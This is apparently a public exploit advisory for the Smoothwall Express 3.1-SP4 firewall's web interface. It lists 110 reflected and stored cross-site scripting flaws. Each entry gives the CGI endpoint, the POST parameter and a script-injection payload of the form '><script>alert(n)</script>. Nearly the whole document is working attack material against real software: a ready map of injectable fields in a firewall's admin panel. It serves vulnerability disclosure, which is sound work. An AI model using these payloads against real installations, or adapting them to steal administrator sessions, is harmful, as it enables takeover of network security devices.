##################################################################################################################################
# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 |
Cross-Site Scripting
# Date: 06.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smoothwall.org
# Software Link:
https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download
# Version: 3.1-SP4-polar-x86_64-update9
##################################################################################################################################

Introduction
The Smoothwall Open Source Project was set up in 2000 to develop and
maintain Smoothwall Express - a Free firewall that includes its own
security-hardened GNU/Linux operating system and an easy-to-use web
interface.


#################################################################################


XSS details: Reflected & Stored

#################################################################################

XSS1 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
CACHE_SIZE

PAYLOAD
'><script>alert(1)</script>

#################################################################################

XSS2 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_SIZE

PAYLOAD
'><script>alert(2)</script>

#################################################################################

XSS3 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MIN_SIZE

PAYLOAD
'><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_OUTGOING_SIZE

PAYLOAD
'><script>alert(4)</script>

#################################################################################

XSS5 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_INCOMING_SIZE

PAYLOAD
'><script>alert(5)</script>

#################################################################################

XSS6 | Stored

URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi

METHOD
Post

PARAMETER
REDIRECT_PAGE

PAYLOAD
'><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi

METHOD
Post

PARAMETER
CHILDREN

PAYLOAD
'><script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_SERVER

PAYLOAD
'><script>alert(8)</script>

#################################################################################

XSS9 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_FILE

PAYLOAD
'><script>alert(9)</script>

#################################################################################

XSS10 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_ROOT

PAYLOAD
'><script>alert(10)</script>

#################################################################################

XSS11 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
START_ADDR

PAYLOAD
'><script>alert(11)</script>

#################################################################################

XSS12 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
END_ADDR

PAYLOAD
'><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DNS1

PAYLOAD
'><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DNS2

PAYLOAD
'><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NTP1

PAYLOAD
'><script>alert(15)</script>

#################################################################################

XSS16 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NTP2

PAYLOAD
'><script>alert(16)</script>

#################################################################################

XSS17 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
WINS1

PAYLOAD
'><script>alert(17)</script>

#################################################################################

XSS18 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
WINS2

PAYLOAD
'><script>alert(18)</script>

#################################################################################

XSS19 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DEFAULT_LEASE_TIME

PAYLOAD
'><script>alert(19)</script>

#################################################################################

XSS20 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
MAX_LEASE_TIME

PAYLOAD
'><script>alert(20)</script>

#################################################################################

XSS21 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DOMAIN_NAME

PAYLOAD
'><script>alert(21)</script>

#################################################################################

XSS22 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS_DOMAIN

PAYLOAD
'><script>alert(22)</script>

#################################################################################

XSS23 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS1

PAYLOAD
'><script>alert(23)</script>

#################################################################################

XSS24 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS2

PAYLOAD
'><script>alert(24)</script>

#################################################################################

XSS25 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_HOST

PAYLOAD
'><script>alert(25)</script>

#################################################################################

XSS26 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_DESC

PAYLOAD
'><script>alert(26)</script>

#################################################################################

XSS27 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_MAC

PAYLOAD
'><script>alert(27)</script>

#################################################################################

XSS28 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_IP

PAYLOAD
'><script>alert(28)</script>

#################################################################################

XSS29 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(29)</script>

#################################################################################

XSS30 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
DOMAIN

PAYLOAD
'><script>alert(30)</script>

#################################################################################

XSS31 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
LOGIN

PAYLOAD
'"><script>alert(31)</script>

#################################################################################

XSS32 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
PASSWORD

PAYLOAD
'><script>alert(32)</script>

#################################################################################

XSS33 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(33)</script>

#################################################################################

XSS34 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'"><script>alert(34)</script>

#################################################################################

XSS35 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(35)</script>

#################################################################################

XSS36 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(36)</script>

#################################################################################

XSS37 | Reflected

URL
http://192.168.2.200:81/cgi-bin/time.cgi?

METHOD
Post

PARAMETER
NTP_SERVER

PAYLOAD
'><script>alert(37)</script>

#################################################################################

XSS38 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
BATTLEVEL

PAYLOAD
'><script>alert(38)</script>

#################################################################################

XSS39 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
RTMIN

PAYLOAD
'><script>alert(39)</script>

#################################################################################

XSS40 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
BATTDELAY

PAYLOAD
'><script>alert(40)</script>

#################################################################################

XSS41 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
TO

PAYLOAD
'><script>alert(41)</script>

#################################################################################

XSS42 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
ANNOY

PAYLOAD
'><script>alert(42)</script>

#################################################################################

XSS43 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSIP

PAYLOAD
'><script>alert(43)</script>

#################################################################################

XSS44 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSNAME

PAYLOAD
'><script>alert(44)</script>

#################################################################################

XSS45 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSPORT

PAYLOAD
'><script>alert(45)</script>

#################################################################################

XSS46 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
POLLTIME

PAYLOAD
'><script>alert(46)</script>

#################################################################################

XSS47 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSUSER

PAYLOAD
'><script>alert(47)</script>

#################################################################################

XSS48 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
NISPORT

PAYLOAD
'><script>alert(48)</script>

#################################################################################

XSS49 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSAUTH

PAYLOAD
'><script>alert(49)</script>

#################################################################################

XSS50 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
EMAIL

PAYLOAD
'><script>alert(50)</script>

#################################################################################

XSS51 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
FROM

PAYLOAD
'><script>alert(51)</script>

#################################################################################

XSS52 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
CC

PAYLOAD
'><script>alert(52)</script>

#################################################################################

XSS53 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
SMSEMAIL

PAYLOAD
'><script>alert(53)</script>

#################################################################################

XSS54 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
SMTPSERVER

PAYLOAD
'><script>alert(54)</script>

#################################################################################

XSS55 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
PORT

PAYLOAD
'><script>alert(55)</script>

#################################################################################

XSS56 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
USER

PAYLOAD
'><script>alert(56)</script>

#################################################################################

XSS57 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
EMAIL_PASSWORD

PAYLOAD
'"><script>alert(57)</script>

#################################################################################

XSS58 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
EXT

PAYLOAD
'><script>alert(58)</script>

#################################################################################

XSS59 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
SRC_PORT_SEL

PAYLOAD
'><script>alert(59)</script>

#################################################################################

XSS60 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
SRC_PORT

PAYLOAD
'><script>alert(60)</script>

#################################################################################

XSS61 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
DEST_IP

PAYLOAD
'><script>alert(61)</script>

#################################################################################

XSS62 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
DEST_PORT_SEL

PAYLOAD
'><script>alert(62)</script>

#################################################################################

XSS63 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(63)</script>

#################################################################################

XSS64 | Reflected

URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?

METHOD
Post

PARAMETER
MACHINE

PAYLOAD
'><script>alert(64)</script>

#################################################################################

XSS65 | Reflected

URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?

METHOD
Post

PARAMETER
MACHINECOMMENT

PAYLOAD
'><script>alert(65)</script>

#################################################################################

XSS66 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
SRC_IP

PAYLOAD
'><script>alert(66)</script>

#################################################################################

XSS67 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
DEST_IP

PAYLOAD
'><script>alert(67)</script>

#################################################################################

XSS68 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(68)</script>

#################################################################################

XSS69 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
EXT

PAYLOAD
'><script>alert(69)</script>

#################################################################################

XSS70 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
DEST_PORT

PAYLOAD
'><script>alert(70)</script>

#################################################################################

XSS71 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(71)</script>

#################################################################################

XSS72 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?

METHOD
Post

PARAMETER
SRC_IP

PAYLOAD
'><script>alert(72)</script>

#################################################################################

XSS73 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(73)</script>

#################################################################################

XSS74 | Reflected

URL
http://192.168.2.200:81/cgi-bin/timedaccess.cgi?

METHOD
Post

PARAMETER
MACHINES

PAYLOAD
'><script>alert(74)</script>

#################################################################################

XSS75 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
GREEN_ADDRESS

PAYLOAD
'><script>alert(75)</script>

#################################################################################

XSS76 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
GREEN_NETMASK

PAYLOAD
'><script>alert(76)</script>

#################################################################################

XSS77 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_DHCP_HOSTNAME

PAYLOAD
'><script>alert(77)</script>

#################################################################################

XSS78 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_ADDRESS

PAYLOAD
'><script>alert(78)</script>

#################################################################################

XSS79 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS1_OVERRIDE

PAYLOAD
'><script>alert(79)</script>

#################################################################################

XSS80 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS2_OVERRIDE

PAYLOAD
'><script>alert(80)</script>

#################################################################################

XSS81 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_MAC

PAYLOAD
'><script>alert(81)</script>

#################################################################################

XSS82 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_NETMASK

PAYLOAD
'><script>alert(82)</script>

#################################################################################

XSS83 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DEFAULT_GATEWAY

PAYLOAD
'><script>alert(83)</script>

#################################################################################

XSS84 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS1

PAYLOAD
'><script>alert(84)</script>

#################################################################################

XSS85 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS2

PAYLOAD
'><script>alert(85)</script>

#################################################################################

XSS86 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
NAME

PAYLOAD
'><script>alert(86)</script>

#################################################################################

XSS87 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
LEFT

PAYLOAD
'><script>alert(87)</script>

#################################################################################

XSS88 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
LEFT_SUBNET

PAYLOAD
'><script>alert(88)</script>

#################################################################################

XSS89 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
RIGHT

PAYLOAD
'><script>alert(89)</script>

#################################################################################

XSS90 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
RIGHT_SUBNET

PAYLOAD
'><script>alert(90)</script>

#################################################################################

XSS91 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
SECRET1

PAYLOAD
'><script>alert(91)</script>

#################################################################################

XSS92 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
SECRET2

PAYLOAD
'><script>alert(92)</script>

#################################################################################

XSS93 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(93)</script>

#################################################################################

XSS94 | Stored

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
filename

PAYLOAD
<script>alert(94)</script>

#################################################################################

XSS95 | Reflected

URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat

METHOD
Post

PARAMETER
SOURCE_IP

PAYLOAD
"><script>alert(95)</script>

#################################################################################

XSS96 | Stored

URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat

METHOD
Post

PARAMETER
FILTER

PAYLOAD
'><script>alert(96)</script>

#################################################################################

XSS97 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipinfo.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'><script>alert(97)</script>

#################################################################################

XSS98 | Reflected

URL
http://192.168.2.200:81/cgi-bin/iptools.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'><script>alert(98)</script>

#################################################################################

XSS99 | Reflected

URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?

METHOD
Post

PARAMETER
WRAP

PAYLOAD
'><script>alert(99)</script>

#################################################################################

XSS100 | Reflected

URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?

METHOD
Post

PARAMETER
SECTIONTITLE

PAYLOAD
'><script>alert(100)</script>

#################################################################################

XSS101 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
INIT

PAYLOAD
'><script>alert(101)</script>

#################################################################################

XSS102 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
HANGUP

PAYLOAD
'><script>alert(102)</script>

#################################################################################

XSS103 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
SPEAKER_ON

PAYLOAD
'><script>alert(103)</script>

#################################################################################

XSS104 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
SPEAKER_OFF

PAYLOAD
'><script>alert(104)</script>

#################################################################################

XSS105 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
TONE_DIAL

PAYLOAD
'><script>alert(105)</script>

#################################################################################

XSS106 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
PULSE_DIAL

PAYLOAD
'><script>alert(106)</script>

#################################################################################

XSS107 | Reflected

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
TIMEOUT

PAYLOAD
'><script>alert(107)</script>

#################################################################################

XSS108 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(108)</script>

#################################################################################

XSS109 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
KEYMAP

PAYLOAD
'><script>alert(109)</script>

#################################################################################

XSS110 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
OPENNESS

PAYLOAD
'><script>alert(110)</script>

#################################################################################